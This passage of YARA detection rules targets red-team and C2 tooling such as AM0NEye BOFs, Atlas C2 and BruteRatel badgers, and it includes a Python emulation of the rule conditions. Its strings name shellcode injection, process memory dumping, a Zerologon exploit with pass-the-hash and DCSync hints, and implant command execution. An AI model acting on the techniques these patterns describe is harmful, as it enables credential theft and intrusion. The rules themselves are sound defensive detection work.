      $s20 = "GCC: (GNU) 12 20220819" fullword ascii
   condition:
      hash.sha256(0, filesize) == "a453b3510ef0aa993b88f49d2a6f7a85bfab407033afb23340287b94eddff86d" or
      uint16(0) == 0x8664 and filesize < 10KB and
      1 of ($x*) and 4 of them
}

rule AM0NEye_SecinjectX64 {
   meta:
      description = "AM0NEye - secinject.x64.o"
      sha256 = "1e5a2a850f7cbfc5d306487ec75bbd436e5c8652304ad2b2a8a14b3386e63efd"
   strings:
      $s1  = "__imp_KERNEL32$GetCurrentProcess" fullword ascii
      $s2  = "__imp_KERNEL32$OpenProcess" fullword ascii
      $s3  = "[!] Error mapping remote process.  Aborting..." fullword ascii
      $s4  = "__imp_KERNEL32$CreateRemoteThread" fullword ascii
      $s5  = "secinject.c" fullword ascii
      $s6  = "[!] Error mapping local process  Aborting..." fullword ascii
      $s7  = "[!] Error unmapping view" fullword ascii
      $s8  = "__imp_NTDLL$NtUnmapViewOfSection" fullword ascii
      $s9  = "__imp_NTDLL$NtMapViewOfSection" fullword ascii
      $s10 = "__imp_NTDLL$NtClose" fullword ascii
      $s11 = "__imp_NTDLL$NtCreateSection" fullword ascii
      $s12 = "[!] Error closing handle" fullword ascii
      $s13 = "mycopy" fullword ascii
      $s14 = "mycmpi" fullword ascii
      $s15 = "__imp_BeaconDataInt" fullword ascii
      $s16 = "[!] Error creating RWX memory section  Aborting..." fullword ascii
      $s17 = "GCC: (GNU) 10-win32 20210110" fullword ascii
      $s18 = "0@.rdata" fullword ascii
   condition:
      hash.sha256(0, filesize) == "1e5a2a850f7cbfc5d306487ec75bbd436e5c8652304ad2b2a8a14b3386e63efd" or
      uint16(0) == 0x8664 and filesize < 8KB and
      8 of them
}

rule AM0NEye_SyscallsdumpX64 {
   meta:
      description = "AM0NEye - syscallsdump.x64.o"
      sha256 = "b33dc013e2168ebb37d8ac80dbcd778c6bda2ede4927b47ec95f32c87ad125fd"
   strings:
      $s1  = "Dumping PID %d to file: %s" fullword ascii
      $s2  = "Failed to retrieve PID %d process handle." fullword ascii
      $s3  = "Failed to create dump file at %s" fullword ascii
      $s4  = "Failed to set debug privilege." fullword ascii
      $s5  = "Failed to create minidump." fullword ascii
      $s6  = "Unhooking - Initial ZwProtectVirtualMemory failed." fullword ascii
      $s7  = "Unhooking - ZwWriteVirtualMemory failed." fullword ascii
      $s8  = "Unhooking - Final ZwProtectVirtualMemory failed." fullword ascii
      $s9  = "__imp_DBGHELP$MiniDumpWriteDump" fullword ascii
      $s10 = "__imp_ADVAPI32$LookupPrivilegeValueW" fullword ascii
      $s11 = "Failed to unhook NtReadVirtualMemory." fullword ascii
      $s12 = "  [!] OS Version not supported." fullword ascii
      $s13 = "SW2_GetSyscallNumber" fullword ascii
      $s14 = "SeDebugPrivilege" fullword wide
      $s15 = "__imp_BeaconDataInt" fullword ascii
      $s16 = "entry.c" fullword ascii
      $s17 = "__imp_MSVCRT$_wcsicmp" fullword ascii
      $s18 = "__imp_MSVCRT$memset" fullword ascii
      $s19 = "UnhookFunction" fullword ascii
      $s20 = "__imp_MSVCRT$swprintf_s" fullword ascii
   condition:
      hash.sha256(0, filesize) == "b33dc013e2168ebb37d8ac80dbcd778c6bda2ede4927b47ec95f32c87ad125fd" or
      uint16(0) == 0x8664 and filesize < 30KB and
      8 of them
}

rule AM0NEye_SyscallsinjectX64 {
   meta:
      description = "AM0NEye - syscallsinject.x64.o"
      sha256 = "23f0aeb7c61716e936820af851e7f5f04927be31cd540aba7717882161b000fb"
   strings:
      $x1  = "Copying shellcode to remote process - FAILED! %08X" fullword ascii
      $x2  = "Executing thread in remote process - FAILED! %08X" fullword ascii
      $s3  = "Shellcode injection completed successfully!" fullword ascii
      $s4  = "Opening process - FAILED! %08X" fullword ascii
      $s5  = "InjectShellcode" fullword ascii
      $s6  = "SW2_GetSyscallNumber" fullword ascii
      $s7  = "__imp_BeaconDataInt" fullword ascii
      $s8  = "entry.c" fullword ascii
      $s9  = "__imp_BeaconDataLength" fullword ascii
      $s10 = "SW2_HashSyscall" fullword ascii
      $s11 = "GCC: (GNU) 10-win32 20200525" fullword ascii
      $s12 = "0@.rdata" fullword ascii
      $s13 = "f=Zwum" fullword ascii
      $s14 = "SW2_PopulateSyscallList" fullword ascii
      $s15 = "SW2_SyscallList" fullword ascii
   condition:
      hash.sha256(0, filesize) == "23f0aeb7c61716e936820af851e7f5f04927be31cd540aba7717882161b000fb" or
      uint16(0) == 0x8664 and filesize < 20KB and
      1 of ($x*) and 4 of them
}

rule AM0NEye_UnhookX86 {
   meta:
      description = "AM0NEye - unhook.x86.o"
      sha256 = "b67570680ffd7ebf5c8479e364c7a50ccf293170feb195172b9d907b5f171a88"
   strings:
      $s1  = "C:\\Users\\user\\Desktop\\unhook-bof\\unhook.x86.o" fullword ascii
      $s2  = "_GetProcessEnvironmentBlock" fullword ascii
      $s3  = "__imp__KERNEL32$GetModuleHandleW@4" fullword ascii
      $s4  = "__imp__KERNEL32$VirtualProtect@16" fullword ascii
      $s5  = "__imp__KERNEL32$CreateFileMappingW@24" fullword ascii
      $s6  = "_CustomGetModuleHandleW" fullword ascii
      $s7  = "__imp__KERNEL32$MapViewOfFile@20" fullword ascii
      $s8  = "_GetRedirectedName_V6" fullword ascii
      $s9  = "__imp__KERNEL32$CloseHandle@4" fullword ascii
      $s10 = "__imp__KERNEL32$UnmapViewOfFile@4" fullword ascii
      $s11 = "__imp__KERNEL32$LoadLibraryW@4" fullword ascii
      $s12 = "_GetRedirectedName" fullword ascii
      $s13 = "_GetInMemoryOrderModuleList" fullword ascii
      $s14 = "_IsBeaconDLL" fullword ascii
      $s15 = "__imp__KERNEL32$CreateFileW@28" fullword ascii
      $s16 = "__imp__KERNEL32$VirtualAlloc@16" fullword ascii
      $s17 = "_GetRedirectedName_V2" fullword ascii
      $s18 = "_GetRedirectedName_V4" fullword ascii
      $s19 = "__imp__KERNEL32$VirtualFree@12" fullword ascii
      $s20 = "_CustomGetProcAddressEx@12" fullword ascii
   condition:
      hash.sha256(0, filesize) == "b67570680ffd7ebf5c8479e364c7a50ccf293170feb195172b9d907b5f171a88" or
      uint16(0) == 0x014c and filesize < 20KB and
      8 of them
}

rule AM0NEye_ZerologonX64 {
   meta:
      description = "AM0NEye - zerologon.x64.o"
      sha256 = "b57f0f8fe3a1682b31f61623ed224b387a56ffa21cba3cf0c75bb27e14536413"
   strings:
      $s1  = "z:\\devcenter\\zerologon\\dist\\zerologon.x64.o" fullword ascii
      $s2  = "%S is not vulnerable" fullword ascii
      $s3  = "Success! Use pth .\\%S 31d6cfe0d16ae931b73c59d7e0c089c0 and run dcscync" fullword ascii
      $s4  = "__imp_NETAPI32$I_NetServerPasswordSet2" fullword ascii
      $s5  = "Failed to set machine account pass for %S" fullword ascii
      $s6  = "0@   /DEFAULTLIB:\"uuid.lib\" /DEFAULTLIB:\"uuid.lib\" /DEFAULTLIB:\"LIBCMT\" /DEFAULTLIB:\"OLDNAMES\" " fullword ascii
      $s7  = "@comp.id}y" fullword ascii
      $s8  = "B.data" fullword ascii
      $s9  = "$unwind$go" fullword ascii
      $s10 = "$pdata$go" fullword ascii
      $s11 = "__imp_NETAPI32$I_NetServerReqChallenge" fullword ascii
      $s12 = "__imp_NETAPI32$I_NetServerAuthenticate2" fullword ascii
      $s13 = "31d6cfe0d16ae931b73c59d7e0c089c0" ascii
      $s14 = "P`.xdata" fullword ascii
      $s15 = "Microsoft (R) Optimizing Compiler" fullword ascii
      $s16 = "$SG87893H" fullword ascii
      $s17 = "$SG87894x" fullword ascii
      $s18 = "$SG87891" fullword ascii
   condition:
      hash.sha256(0, filesize) == "b57f0f8fe3a1682b31f61623ed224b387a56ffa21cba3cf0c75bb27e14536413" or
      uint16(0) == 0x8664 and filesize < 5KB and
      8 of them
}

rule AM0NEye_ZerologonX86 {
   meta:
      description = "AM0NEye - zerologon.x86.o"
      sha256 = "ddd797f2afb0f0cf3e85532d937e475f3af778b6032b979f3b739904b2c7bc07"
   strings:
      $s1 = "Z:\\devcenter\\zerologon\\dist\\zerologon.x86.o" fullword ascii
      $s2 = "%S is not vulnerable" fullword ascii
      $s3 = "Success! Use pth .\\%S 31d6cfe0d16ae931b73c59d7e0c089c0 and run dcscync" fullword ascii
      $s4 = "__imp__NETAPI32$I_NetServerPasswordSet2" fullword ascii
      $s5 = "Failed to set machine account pass for %S" fullword ascii
      $s6 = "P`   /DEFAULTLIB:\"uuid.lib\" /DEFAULTLIB:\"uuid.lib\" /DEFAULTLIB:\"LIBCMT\" /DEFAULTLIB:\"OLDNAMES\" " fullword ascii
      $s7 = "@comp.id}y" fullword ascii
      $s8 = "B.data" fullword ascii
      $s9 = "__imp__BeaconDataExtract" fullword ascii
      $s10 = "__imp__BeaconPrintf" fullword ascii
      $s11 = "__imp__BeaconDataParse" fullword ascii
      $s12 = "__imp__NETAPI32$I_NetServerReqChallenge" fullword ascii
      $s13 = "31d6cfe0d16ae931b73c59d7e0c089c0" ascii
      $s14 = "__imp__NETAPI32$I_NetServerAuthenticate2" fullword ascii
      $s15 = "Microsoft (R) Optimizing Compiler" fullword ascii
      $s16 = "$SG87301" fullword ascii
      $s17 = "$SG87303H" fullword ascii
      $s18 = "$SG87304t" fullword ascii
   condition:
      hash.sha256(0, filesize) == "ddd797f2afb0f0cf3e85532d937e475f3af778b6032b979f3b739904b2c7bc07" or
      uint16(0) == 0x014c and filesize < 4KB and
      8 of them
}

rule AM0NEye_CurlX86 {
   meta:
      description = "AM0NEye - curl.x86.o"
      sha256 = "21d2d2a5068827890e30ec5438de5ef22401cd67e5aab69e2a76881c842bd4a4"
   strings:
      $s1 = "User Agent: %s" fullword ascii
      $s2 = "__imp__KERNEL32$lstrlenA@4" fullword ascii
      $s3 = "Retrieving HTTP Request info failed" fullword ascii
      $s4 = "__imp__WININET$HttpSendRequestA@20" fullword ascii
      $s5 = "__imp__WININET$InternetReadFile@16" fullword ascii
      $s6 = "__imp__WININET$HttpQueryInfoA@20" fullword ascii
      $s7 = "__imp__WININET$HttpOpenRequestA@32" fullword ascii
      $s8 = "%s %s:%i %s" fullword ascii
      $s9 = "Response Code: %s" fullword ascii
      $s10 = "entry.c" fullword ascii
      $s11 = "No response." fullword ascii
      $s12 = "__imp__BeaconDataInt" fullword ascii
      $s13 = "__imp__WININET$InternetCloseHandle@4" fullword ascii
      $s14 = "__imp__WININET$InternetOpenA@20" fullword ascii
      $s15 = "__imp__BeaconDataExtract" fullword ascii
      $s16 = "__imp__WININET$InternetConnectA@32" fullword ascii
      $s17 = "__imp__MSVCRT$strtok" fullword ascii
      $s18 = "__imp__MSVCRT$strcmp" fullword ascii
      $s19 = "__imp__BeaconPrintf" fullword ascii
      $s20 = "__imp__BeaconDataParse" fullword ascii
   condition:
      hash.sha256(0, filesize) == "21d2d2a5068827890e30ec5438de5ef22401cd67e5aab69e2a76881c842bd4a4" or
      uint16(0) == 0x014c and filesize < 9KB and
      8 of them
}

rule AM0NEye_SyscallsapcspawnX64 {
   meta:
      description = "AM0NEye - syscallsapcspawn.x64.o"
      sha256 = "defaacd4c05addae13998f3dce82e12e2f8f7c48af1e9061071f8157f01f7b61"
   strings:
      $s1  = "Shellcode injection completed successfully!" fullword ascii
      $s2  = "__imp_BeaconSpawnTemporaryProcess" fullword ascii
      $s3  = "Failed to spawn process." fullword ascii
      $s4  = "InjectShellcode" fullword ascii
      $s5  = "Failed to spawn process. Exiting..." fullword ascii
      $s6  = "NtResumeThread - FAILED! %08X" fullword ascii
      $s7  = "Spawned Process with PID: %d" fullword ascii
      $s8  = "NtQueueApcThread - FAILED! %08X" fullword ascii
      $s9  = "__imp_BeaconCleanupProcess" fullword ascii
      $s10 = "NtUnmapViewOfSection - FAILED! %08X" fullword ascii
      $s11 = "NtCreateSection - FAILED! %08X" fullword ascii
      $s12 = "NtMapViewOfSection2 - FAILED! %08X" fullword ascii
      $s13 = "NtMapViewOfSection - FAILED! %08X" fullword ascii
      $s14 = "SW2_GetSyscallNumber" fullword ascii
      $s15 = "entry.c" fullword ascii
      $s16 = "__imp_MSVCRT$memcpy" fullword ascii
      $s17 = "__imp_BeaconDataLength" fullword ascii
      $s18 = "SW2_HashSyscall" fullword ascii
      $s19 = "GCC: (GNU) 10-win32 20200525" fullword ascii
      $s20 = "0@.rdata" fullword ascii
   condition:
      hash.sha256(0, filesize) == "defaacd4c05addae13998f3dce82e12e2f8f7c48af1e9061071f8157f01f7b61" or
      uint16(0) == 0x8664 and filesize < 30KB and
      8 of them
}

rule AM0NEye_PopCalc {
   meta:
      description = "AM0NEye - popCalc.bin"
      sha256 = "70488c62e7f56badbde76fb5a5d69fa6d7c1d4243f4a256106a7de2e5b4253ca"
   strings:
      $s1 = "AQAPRQVH1" fullword ascii
      $s2 = "AXAX^YZAXAYAZH" fullword ascii
      $s3 = "calc.exe" fullword ascii
   condition:
      hash.sha256(0, filesize) == "70488c62e7f56badbde76fb5a5d69fa6d7c1d4243f4a256106a7de2e5b4253ca" or
      uint16(0) == 0x48fc and filesize < 1KB and
      all of them
}


- Atlas C2

import "hash"
import "pe"

rule AtlasC2_ClientDll {
   meta:
      description = "AtlasC2 - Client.dll"
      sha256 = "86979aca65aef25f18132a2fc328f3d9234298e9d9c3b6cbd4a98a1ac7728c9d"
   strings:
      $x1  = "Executes a command in the context of cmd.exe" fullword wide
      $x2  = "Execute a PS command using the PS DLLs" fullword wide
      $s3  = "command to execute" fullword wide
      $s4  = "Client.dll" fullword wide
      $s5  = "[*] Usage: RmDir [targetDir]" fullword wide
      $s6  = "[*] Usage: RmFile [targetFile]" fullword wide
      $s7  = "Fetch user id of user running implant process" fullword wide
      $s8  = "<UtilExecute>b__0" fullword ascii
      $s9  = "UtilExecute" fullword ascii
      $s10 = "<UtilExecute>b__8_0" fullword ascii
      $s11 = "ExecuteAssemMethod" fullword wide
      $s12 = "ExecuteAssem" fullword wide
      $s13 = "[*] Usage: Getuid" fullword wide
      $s14 = "Execute a specifed assem type from its entry point" fullword wide
      $s15 = "Executes specified method belonging to a loaded assem type" fullword wide
      $s16 = "[-] Connection to teamserver could not be established or no implant currently set" fullword wide
      $s17 = "path to PowerShell file to load into implant process" fullword wide
      $s18 = "byte array to load into implant process" fullword wide
      $s19 = "System.ComponentModel.Primitives" fullword ascii
      $s20 = "System.Net.WebClient" fullword ascii
   condition:
      hash.sha256(0, filesize) == "86979aca65aef25f18132a2fc328f3d9234298e9d9c3b6cbd4a98a1ac7728c9d" or
      uint16(0) == 0x5a4d and filesize < 100KB and
      1 of ($x*) and 4 of them
}

rule AtlasC2_Implant {
   meta:
      description = "AtlasC2 - Implant.exe"
      sha256 = "6d4c2d46f9fd7210da8df30879729a85287d38874dc84436e0f1f295b1072d09"
   strings:
      $s1  = "Implant.Tasks.Execute" fullword ascii
      $s2  = "Implant.exe" fullword wide
      $s3  = "ExecuteAssemMethod" fullword wide
      $s4  = "ExecuteAssem" fullword wide
      $s5  = "ExecuteAssemEP" fullword ascii
      $s6  = " loaded into implant process" fullword wide
      $s7  = "(Implant.Models.HTTPComms+<PostData>d__18" fullword ascii
      $s8  = "        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>" fullword ascii
      $s9  = "<targetDir>k__BackingField" fullword ascii
      $s10 = "get_targetFile" fullword ascii
      $s11 = "set_targetDir" fullword ascii
      $s12 = "<targetFile>k__BackingField" fullword ascii
      $s13 = "get_targetDir" fullword ascii
      $s14 = "set_targetFile" fullword ascii
      $s15 = "GetHostIP" fullword ascii
      $s16 = "<targetPath>k__BackingField" fullword ascii
      $s17 = "get_Encoded" fullword ascii
      $s18 = "set_targetPath" fullword ascii
      $s19 = "ImplantCommands" fullword ascii
      $s20 = "set_UseShellExecute" fullword ascii
   condition:
      hash.sha256(0, filesize) == "6d4c2d46f9fd7210da8df30879729a85287d38874dc84436e0f1f295b1072d09" or
      pe.characteristics & pe.EXECUTABLE_IMAGE and
      uint16(0) == 0x5a4d and filesize < 100KB and
      8 of them
}

rule AtlasC2_Client {
   meta:
      description = "AtlasC2 - Client.exe"
      sha256 = "3fcc85c86db9e7f5e218d56af9f7ecabbf0284e447c3a70a14c89138d33d384b"
   strings:
      $s1  = "hostfxr.dll" fullword wide
      $s2  = "--- Invoked %s [version: %s, commit hash: %s] main = {" fullword wide
      $s3  = "This executable is not bound to a managed DLL to execute. The binding value is: '%s'" fullword wide
      $s4  = "D:\\a\\_work\\1\\s\\artifacts\\obj\\win-x64.Release\\corehost\\cli\\apphost\\standalone\\Release\\apphost.pdb" fullword ascii
      $s5  = "Client.dll" fullword wide
      $s6  = "  - %s&apphost_version=%s" fullword wide
      $s7  = "The managed DLL bound to this executable is: '%s'" fullword wide
      $s8  = "A fatal error was encountered. This executable was not bound to load a managed DLL." fullword wide
      $s9  = "Showing error dialog for application: '%s' - error code: 0x%x - url: '%s'" fullword wide
      $s10 = "Failed to resolve full path of the current executable [%s]" fullword wide
      $s11 = "https://go.microsoft.com/fwlink/?linkid=798306" fullword wide
      $s12 = "The managed DLL bound to this executable could not be retrieved from the executable image." fullword wide
      $s13 = "        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>" fullword ascii
      $s14 = "  - Installing .NET prerequisites might help resolve this problem." fullword wide
      $s15 = "  - https://aka.ms/dotnet-core-applaunch?" fullword wide
      $s16 = "Failed to load the dll from [%s], HRESULT: 0x%X" fullword wide
      $s17 = "The required library %s does not support relative app dll paths." fullword wide
      $s18 = "Failed to read environment variable [%s], HRESULT: 0x%X" fullword wide
      $s19 = "The application to execute does not exist: '%s'." fullword wide
      $s20 = "apphost" fullword wide
   condition:
      hash.sha256(0, filesize) == "3fcc85c86db9e7f5e218d56af9f7ecabbf0284e447c3a70a14c89138d33d384b" or
      pe.characteristics & pe.EXECUTABLE_IMAGE and
      uint16(0) == 0x5a4d and filesize < 400KB and
      8 of them
}


- BruteRatel

These detection rules are built for educational purposes and target unlicensed (abused), cracked, and underground versions. The legitimate version of BruteRatel will not be detected by these rules, which are intended for cybersecurity professionals and red team specialists.
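Every rule on this page (the AM0NEye BOF rules above, the Atlas C2 rules, and the BruteRatel rules that follow) shares one condition skeleton: an exact SHA-256 match on a known build, or else a header gate on `uint16(0)`, a `filesize` cap, in the BruteRatel case a `math.entropy(0, filesize) >= 7` gate, and an "N of them" count of `fullword ascii` strings. The following is an added example, not code from the Resecurity post or from any C2 project: a pure-Python stand-in for those YARA primitives, with the AM0NEye `syscallsinject.x64.o` rule transcribed (a subset of its strings) so a defender can see exactly what each clause gates on. The `RuleSpec`, `evaluate` and `build_sample` names are this example's own, and every sample buffer is constructed here; none is a real payload.

```python
"""Added example (not from the Resecurity post or any C2 project): a pure-Python
stand-in for the YARA condition skeleton used throughout this page:

    hash.sha256(0, filesize) == "<known build>"                       # exact match
    or uint16(0) == <magic> and filesize < <limit>
       [and math.entropy(0, filesize) >= 7] and N of them             # heuristic
"""
from __future__ import annotations

import hashlib
import math
import re
from dataclasses import dataclass
from typing import Dict, Optional, Tuple

# uint16(0) is read little-endian, so 0x8348 means the file starts with bytes 48 83.
MAGIC_MEANING = {
    0x5A4D: "MZ header: PE image (Atlas/BruteRatel .exe and .dll rules)",
    0x8664: "COFF object, IMAGE_FILE_MACHINE_AMD64 (x64 BOF rules)",
    0x014C: "COFF object, IMAGE_FILE_MACHINE_I386 (x86 BOF rules)",
    0x8348: "raw x64 shellcode starting 48 83 .. (REX.W + 83 /r, e.g. and rsp,imm8)",
    0xE483: "raw x86 shellcode starting 83 e4 .. (and esp,imm8)",
}


def sha256_hex(data: bytes) -> str:
    """hash.sha256(0, filesize)"""
    return hashlib.sha256(data).hexdigest()


def uint16_le(data: bytes) -> int:
    """uint16(0): first two bytes, little-endian; -1 if the file is too short."""
    return int.from_bytes(data[:2], "little") if len(data) >= 2 else -1


def shannon_entropy(data: bytes) -> float:
    """math.entropy(0, filesize): Shannon entropy in bits per byte, 0.0 .. 8.0."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def fullword_ascii(data: bytes, needle: bytes) -> bool:
    """YARA `fullword`: the match may not be preceded or followed by [A-Za-z0-9]."""
    pattern = rb"(?<![A-Za-z0-9])" + re.escape(needle) + rb"(?![A-Za-z0-9])"
    return re.search(pattern, data) is not None


@dataclass
class RuleSpec:                              # hypothetical container, this example's own
    name: str
    magic: int                               # compared against uint16(0)
    max_size: int                            # filesize < max_size
    strings: Dict[str, bytes]                # identifier -> fullword ascii string
    min_hits: int                            # "N of them"
    known_sha256: Tuple[str, ...] = ()
    min_entropy: Optional[float] = None      # BruteRatel rules: math.entropy >= 7
    require_x: bool = False                  # "1 of ($x*)" (AM0NEye, Atlas client)


def evaluate(rule: RuleSpec, data: bytes) -> Tuple[bool, dict]:
    """Return (matched, detail); the hash branch short-circuits like YARA's `or`."""
    hits = [sid for sid, s in rule.strings.items() if fullword_ascii(data, s)]
    if sha256_hex(data) in rule.known_sha256:
        return True, {"reason": "sha256", "hits": hits}
    checks = {
        "magic": uint16_le(data) == rule.magic,
        "size": len(data) < rule.max_size,
        "strings": len(hits) >= rule.min_hits,
    }
    if rule.min_entropy is not None:
        checks["entropy"] = shannon_entropy(data) >= rule.min_entropy
    if rule.require_x:
        checks["x"] = any(sid.startswith("$x") for sid in hits)
    return all(checks.values()), {"reason": "heuristic", "checks": checks, "hits": hits}


# AM0NEye_SyscallsinjectX64 from this page, transcribed with a subset of its strings.
AM0NEYE_SYSCALLSINJECT_X64 = RuleSpec(
    name="AM0NEye_SyscallsinjectX64", magic=0x8664, max_size=20 * 1024,
    min_hits=4, require_x=True,
    known_sha256=("23f0aeb7c61716e936820af851e7f5f04927be31cd540aba7717882161b000fb",),
    strings={
        "$x1": b"Copying shellcode to remote process - FAILED! %08X",
        "$x2": b"Executing thread in remote process - FAILED! %08X",
        "$s3": b"Shellcode injection completed successfully!",
        "$s5": b"InjectShellcode",
        "$s6": b"SW2_GetSyscallNumber",
        "$s7": b"__imp_BeaconDataInt",
        "$s10": b"SW2_HashSyscall",
    },
)


def build_sample(magic: int, strings: list, pad: int = 512) -> bytes:
    """Constructed buffer: 20-byte COFF-header stand-in, padding, NUL-separated strings."""
    header = magic.to_bytes(2, "little") + b"\x00" * 18
    return header + b"\x00" * pad + b"\x00".join(strings) + b"\x00"


_S = list(AM0NEYE_SYSCALLSINJECT_X64.strings.values())          # constructed inputs below
SAMPLE_COFF_HIT = build_sample(0x8664, [_S[0], _S[2], _S[3], _S[4], _S[5]])   # x64 COFF, $x1 + 4
SAMPLE_WRONG_MAGIC = build_sample(0x5A4D, [_S[0], _S[2], _S[3], _S[4], _S[5]])  # same strings, MZ
SAMPLE_NO_X = build_sample(0x8664, [_S[2], _S[3], _S[4], _S[5], _S[6]])         # 5 hits, no $x

if __name__ == "__main__":
    for label, buf in [("hit", SAMPLE_COFF_HIT), ("wrong magic", SAMPLE_WRONG_MAGIC), ("no $x", SAMPLE_NO_X)]:
        ok, detail = evaluate(AM0NEYE_SYSCALLSINJECT_X64, buf)
        print(f"{label:12s} matched={ok} {detail}")
    print("entropy of 1 KiB covering every byte value:", shannon_entropy(bytes(range(256)) * 4))
```

Two things this makes visible that the rule text alone does not. First, `and` binds tighter than `or` in YARA, so the hash clause stands on its own and the remaining clauses form one heuristic branch; a sample that fails the header gate (the `SAMPLE_WRONG_MAGIC` case) is rejected no matter how many strings it carries. Second, the BruteRatel rules' `math.entropy(0, filesize) >= 7` gate means their heuristic branch only fires on highly packed or encrypted builds; a low-entropy build is caught only by its listed hash, which is the caveat to keep in mind when judging coverage. For real scanning, compile the page's rules with the `yara` CLI or `yara-python`; this emulation is for reading the conditions, not for replacing the engine.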

import "hash"
import "pe"
import "math"

rule BruteRatel_BadgerDll_x64 {
   meta:
      description = "BruteRatel - badger_x64.dll"
      sha256_1 = "2ca4eb35ab5181c6170421413afccb8f10259a4f6460a28c5b57a92c91672307"
      sha256_2 = "e9eccdb3b023ef3e8d267ff8f32e957b75711b5489cd5df3a000ab7cac53155e"
   strings:
      $s1  = "HK2PVH1A.dll" fullword ascii
      $s2  = "  VirtualQuery failed for %d bytes at address %p" fullword ascii
      $s3  = "%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p." fullword ascii
      $s4  = "$K~D:\\" fullword ascii
      $s5  = "  VirtualProtect failed with code 0x%x" fullword ascii
      $s6  = "^CN:\\Z" fullword ascii
      $s7  = "AYAXZYPAQH" fullword ascii
      $s8  = "AWAVAUATM" fullword ascii
      $s9  = "  Unknown pseudo relocation protocol version %d." fullword ascii
      $s10 = " -9.6p" fullword ascii
      $s11 = "fv* VE" fullword ascii
      $s12 = "> /Mq/" fullword ascii
      $s13 = "ygfL,.'" fullword ascii
      $s14 = "POIOWiAu" fullword ascii
      $s15 = "^(d{f>v AXQRAPAQL" fullword ascii
      $s16 = "GxnyNxL" fullword ascii
      $s17 = "UQAi1qv" fullword ascii
      $s18 = "tJmyU}1" fullword ascii
      $s19 = "!qtel-oT" fullword ascii
      $s20 = "QRDJB2Q" fullword ascii
      $s21 = "C3OQGC2D.dll" fullword ascii
      $s22 = "AYAXZYPAQH" fullword ascii
   condition:
      hash.sha256(0, filesize) == "2ca4eb35ab5181c6170421413afccb8f10259a4f6460a28c5b57a92c91672307" or
      hash.sha256(0, filesize) == "e9eccdb3b023ef3e8d267ff8f32e957b75711b5489cd5df3a000ab7cac53155e" or
      math.entropy(0, filesize) >= 7 and
      pe.imports("kernel32.dll", "VirtualProtect") and
      pe.characteristics & pe.DLL and
      uint16(0) == 0x5a4d and filesize < 700KB and
      8 of them
}

rule BruteRatel_BadgerBin_x64_RtlExitUserThread {
   meta:
      description = "BruteRatel - badger_x64_RtlExitUserThread.bin"
      sha256_1 = "6d7ba1938fb5de743f867cf3104df89a5e3afed80c0c5861c77e7befc073f3d8"
      sha256_2 = "1b13d5dab78b7b6c4d85ec5eb9e60854c37287384d7266d5c6583b8367f69583"
   strings:
      $s1  = "AYAXZYPAQH" fullword ascii
      $s2  = "AWAVAUATM" fullword ascii
      $s3  = "tpGb#_," fullword ascii
      $s4  = "OEvy[)q" fullword ascii
      $s5  = "pmiSTvdy" fullword ascii
      $s6  = "TaLcDw;lI" fullword ascii
      $s7  = "MrVeO[9" fullword ascii
      $s8  = "WUtEFwQX" fullword ascii
      $s9  = "9WVZeLFi" fullword ascii
      $s10 = "eIvV0h+" fullword ascii
      $s11 = "zllG!r*" fullword ascii
      $s12 = "mZnFr_." fullword ascii
      $s13 = "sLIv9`0T" fullword ascii
      $s14 = "$vufz?" fullword ascii
      $s15 = "Q5/*}@}ud%AXQRAPAQL" fullword ascii
      $s16 = "AWAVAUATWVH" fullword ascii
      $s17 = "oaNpx3" fullword ascii
      $s18 = "\\0X/pa" fullword ascii
      $s19 = "VfaFB0" fullword ascii
      $s20 = "\\x(BEI" fullword ascii
      $s21 = "ZgaoJ,9" fullword ascii
      $s22 = "IpKSfvlR" fullword ascii
      $s23 = "d%>d$/:iAXQRAPAQL" fullword ascii
      $s24 = "/Yesbu/6" fullword ascii
      $s25 = "teXrmE<" fullword ascii
   condition:
      hash.sha256(0, filesize) == "6d7ba1938fb5de743f867cf3104df89a5e3afed80c0c5861c77e7befc073f3d8" or
      hash.sha256(0, filesize) == "1b13d5dab78b7b6c4d85ec5eb9e60854c37287384d7266d5c6583b8367f69583" or
      math.entropy(0, filesize) >= 7 and
      uint16(0) == 0x8348 and filesize < 700KB and
      6 of them
}

rule BruteRatel_BadgerService_x64 {
   meta:
      description = "BruteRatel - badger_x64_service.exe"
      sha256_1 = "361979575789d281b536a0fac47928de0f7a77a41715271017897a521a601ff8"
      sha256_2 = "9de63114a0173f1c599cb4035961ce400ffeea6a178f4a89ee542972dcd42154"
   strings:
      $s1  = "Manages universal application core process that in Windows 8 and continues in Windows 10. It is used to determine whether univer" ascii
      $s2  = "  VirtualQuery failed for %d bytes at address %p" fullword ascii
      $s3  = "%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p." fullword ascii
      $s4  = "Manages universal application core process that in Windows 8 and continues in Windows 10. It is used to determine whether univer" ascii
      $s5  = "  VirtualProtect failed with code 0x%x" fullword ascii
      $s6  = "tion or microphone. It helps to transact records of your universal apps with the trust and privacy settings of user." fullword ascii
      $s7  = "TransactionBrokerService" fullword ascii
      $s8  = "AYAXZYPAQH" fullword ascii
      $s9  = "AWAVAUATM" fullword ascii
      $s10 = "  Unknown pseudo relocation protocol version %d." fullword ascii
      $s11 = "\\BeiSp /" fullword ascii
      $s12 = "BZ' -aH" fullword ascii
      $s13 = ">qP'4- J>" fullword ascii
      $s14 = ":MZuWHcB<H" fullword ascii
      $s15 = "JNacN'j" fullword ascii
      $s16 = "'BYMX?k" fullword ascii
      $s17 = "!FruL1ZLWlM9" fullword ascii
      $s18 = "oRvNu7I" fullword ascii
      $s19 = "oqd!a #saAXQRAPAQL" fullword ascii
      $s20 = "c-QVpl*bUM" fullword ascii
   condition:
      hash.sha256(0, filesize) == "361979575789d281b536a0fac47928de0f7a77a41715271017897a521a601ff8" or
      hash.sha256(0, filesize) == "9de63114a0173f1c599cb4035961ce400ffeea6a178f4a89ee542972dcd42154" or
      math.entropy(0, filesize) >= 7 and
      pe.imports("kernel32.dll", "VirtualProtect") and
      pe.imports("advapi32.dll", "ChangeServiceConfig2A") and
      pe.imports("advapi32.dll", "ChangeServiceConfigA") and
      pe.imports("advapi32.dll", "StartServiceCtrlDispatcherA") and
      pe.characteristics & pe.EXECUTABLE_IMAGE and
      uint16(0) == 0x5a4d and filesize < 700KB and
      8 of them
}

rule BruteRatel_BadgerStealthBin_x64_RtlExitUserThread {
   meta:
